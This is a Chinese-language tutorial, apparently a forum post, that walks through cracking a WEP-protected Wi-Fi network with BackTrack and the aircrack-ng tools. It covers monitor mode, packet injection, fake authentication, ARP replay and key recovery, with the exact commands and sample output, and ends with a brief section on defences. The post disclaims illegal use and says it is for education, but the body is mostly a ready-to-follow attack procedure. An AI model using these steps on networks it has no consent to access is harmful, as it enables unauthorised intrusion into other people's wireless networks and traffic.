首先声明,嗅探公开频道的信息不违法,对嗅探得信息进行运算也不违法,但是未经同意使用他人WLAN是违法的。对擅自使用本文造成的一切后果,本人不承担一切责任!
不要再说什么邻居没有WEP之类的。本文是以科普目的写的。不是教唆犯罪。
WLAN的加密方式,在非专业级别有三种,1)明文,也就是不加密,2)WEP,和3)WPA/WPA2。如果周围有人还用明文WLAN,那就省事儿了,不用费心破解了。如果周围所有人都在用WPA/WPA2,也省事儿了,破解也破解不了。目前还没有有效破解WPA/WPA2的方法。如果有人用WEP的话,请继续看下去。
准备工具
1.一台带无线网卡的电脑。推荐轻薄笔记本,因为你有可能需要在房子里面走来走去以找信号好的地方。网卡的型号也是有要求的。虽然通过查询型号也能确定是否支持,还是用后面的测试工具方便。
2.一张BackTrack的LiveCD或LiveUSB。下载地址是http://www.backtrack-linux.org/downloads/。制作LiveUSB的教程:http://www.backtrack-linux.org/tutorials/usb-live-install/
3.最好自己搭建一个无线热点来进行训练。注意,本文需要一个有流量的无线网。如果自己搭建无线网,用一台无线上网的电脑连入这个无线网。每隔一会儿开一个网页,或者挂着qq都行。假定热点的设置如下:
MAC地址:00:11:22:33:44:55
SSID:tbc
频道:9
复制代码
破解过程
首先,用BackTrack开机。开机以后,可以选择使用startx命令打开GUI,或者使用CTRL+ALT+Fx在不同shell下切换。
以下是步骤的简介
1.打开无线网卡的监听模式
2.测试无线网卡能否插入数据
3.进行fake authentication,让AP接受你发的包
4.打开嗅探工具
5.发送ARP包让数据获得更快
6.利用破解工具算出密码
复制代码
第一步、打开无线网卡的监听模式
这一步的目的是让无线网卡接收听到的所有数据包。通常情况下,无线网卡只向系统汇报发给你的数据包,而忽略发给别人的数据包。
先将无线网卡关闭:
airmon-ng stop wlan0
复制代码
系统回复:
Interface Chipset Driver
wlan0 Atheros madwifi-ng (Stopped)
复制代码
然后在第9频道打开监听模式:
airmon-ng start wlan0 9
复制代码
系统回复:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
mon0 Atheros madwifi-ng (monitor mode enabled)
复制代码
第二步、测试无线网卡能否插入数据
这一步有两个目的。第一是测试无线网卡是不是被破解软件支持。还有就是测试你的无线网卡发送的数据是否能被被攻击的热点接收到。
运行:
aireplay-ng -9 -e tbc -a 00:11:22:33:44:55 wlan0
复制代码
系统回复:
09:23:35 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP
09:23:37 Trying directed probe requests...
09:23:37 00:11:22:33:44:55 - channel: 9 - 'tbc'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%
复制代码
如果第三行没有出现,那么证明你的无线网卡不被破解软件支持。唯一解决办法是更换。如果出现了第三行而最后一行出现非常低的百分比。那么有可能是因为你电脑距离热点太远,换个位置或者换一个无线网。
第三步、打开嗅探工具
在一个独立的命令行里运行:
airodump-ng -c 9 --bssid 00:11:22:33:44:55 -w output wlan0
复制代码
如果运行成功,会出现类似下面的输出,里面的#Data是我们得到了多少数据的意思:
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 42 100 5240 178307 338 9 54 WEP WEP tbc
BSSID STATION PWR Lost Packets Probes
00:11:22:33:44:55 00:0C:C5:33:CA:27 42 0 183782
复制代码
第四步、进行fake authentication,让AP接受你发的包
这一步的目的是跟热点进行一次简单握手。这样热点就会接受你发出来的数据包。
运行:
aireplay-ng -1 0 -e tbc -a 00:11:22:33:44:55 wlan0
复制代码
握手成功会得到以下回复:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
复制代码
第五步、发送ARP包让数据获得更快
这一步的目的是让无线网发送更多我们关心的数据,以加速破解过程。
运行:
aireplay-ng -3 -b 00:11:22:33:44:55 wlan0
复制代码
刚开始会不动几秒,过一会儿会变成类似下面的输出:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
复制代码
第六步、利用破解工具算出密码
当我们得到了足够的数据以后,就可以进行破解了。多少数据算是足够数据呢?以我的经验,#Data数字达到三万就可以了。如果计算不成功,可以多等一会儿,等数量再涨一涨再算。
运行:
aircrack-ng -b 00:11:22:33:44:55 output*.cap
复制代码
如果成功破解,会出现类似下面的回复:
Aircrack-ng 0.9
[00:03:06] Tested 674449 keys (got 96610 IVs)
KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)
KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
复制代码
P.S.怎么扫描周围的无线网呢?可以使用另外一款BackTrack自带的软件kismet。在命令行里面输入kismet。这个软件可以告诉你周围每一个无线网的SSID,MAC,频道,加密方式,信号强度等。
P.P.S.讲了这么多怎么破解,然后怎么防呢?防范有多种方法,要综合使用,1)最重要的是使用WPA/WPA2,并且使用一个复杂的密码。其他的只能让破解绕个弯儿,不能从本质解决问题,2)隐藏SSID,3)只允许指定MAC连接。 |
|